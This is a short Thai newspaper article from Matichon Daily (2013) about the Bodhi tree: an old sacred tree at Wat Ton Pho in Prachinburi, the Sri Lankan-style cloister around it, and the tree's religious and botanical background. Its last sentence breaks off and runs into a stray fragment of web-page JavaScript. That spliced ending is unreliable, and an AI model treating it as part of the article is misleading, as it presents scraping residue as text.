มติชนรายวัน ฉบับประจำวันจันทร์ที่ 25 กุมภาพันธ์ 2556

 

          1. ต้นโพธิ์ เป็นต้นไม้ที่มีคนกราบไหว้มากที่สุดในโลก

          ต้นโพธิ์เก่าแก่ที่สุดในประวัติศาสตร์ของไทยที่ยังมีชีวิตอยู่ในปัจจุบัน น่าจะเป็นต้นศรีมหาโพธิ์ ที่วัดต้นโพธิ์ฯ อ. ศรีมโหสถ จ. ปราจีนบุรี

          ซึ่งมีแล้วตั้งแต่ก่อน พ.ศ. 2000 ตามคำบอกเล่าเกี่ยวกับมหาเถรศรีศรัทธาราชจุฬามุนี เจ้านายรัฐสุโขทัยที่เสด็จธุดงค์ไปลังกา แล้วได้พระศรีมหาโพธิ์จากลังกามาปลูกในบ้านเมืองยุคนั้นหลายแห่ง

วิหารคดไม้ รอบต้นโพธิ์ (รูปเก่าจากหนังสือ วัดต้นโพธิ์ศรีมหาโพธิ โดย สุจิตต์ วงษ์เทศ พิมพ์ครั้งแรก พ.ศ. 2511)

          2. ระเบียงคดรอบต้นโพธิ์ ที่ชาวบ้านมักเรียกวิหารคด ได้แบบจากลังกา คือการกั้นเขตให้เกิดพื้นที่ศักดิ์สิทธิ์อยู่ภายใน เป็นลานเรียบรอบต้นโพธิ์ แยกออกจากพื้นที่สาธารณะภายนอก ซึ่งเท่ากับย้ำความสำคัญของต้นโพธิ์ให้มีฐานะสูงส่งและศักดิ์สิทธิ์ยิ่งขึ้น

ต้นพระศรีมหาโพธิ์ เมืองอนุราธปุระ ศรีลังกา ต้นแบบระเบียงคดไม้รอบต้นโพธิ์ ที่วัดต้นโพธิ์ฯ อ. ศรีมโหสถ จ. ปราจีนบุรี

          3. ต้นโพธิ์ มีคนกราบไหว้มากที่สุดในโลก เพราะเป็นต้นไม้ศักดิ์สิทธิ์ในอินเดียโบราณตั้งแต่ก่อนพุทธกาล หรือก่อนมีพระพุทธเจ้า สืบจนยุคพระพุทธเจ้า ตราบจนทุกวันนี้

ต้นพระศรีมหาโพธิ์ปัจจุบันที่คยา ในอินเดีย ปลูกอยู่ตำแหน่งเดิมของต้นพระศรีมหาโพธิ์ต้นแรก

          4.  พันธุ์ต้นโพธิ์ ต้นโพธิ์เป็นพันธุ์ไม้ตระกูลเดียวกับต้นไทร, ต้นมะเดื่อ และต้นกร่าง มีถิ่นกำเนิดแถบเอเชียใต้-อินเดีย แพร่พันธุ์โดยวิธีต่างๆ เช่น เพาะเมล็ด, ตอนกิ่ง}d.getElementsByTagName(‘head’)[0].appendChild(s);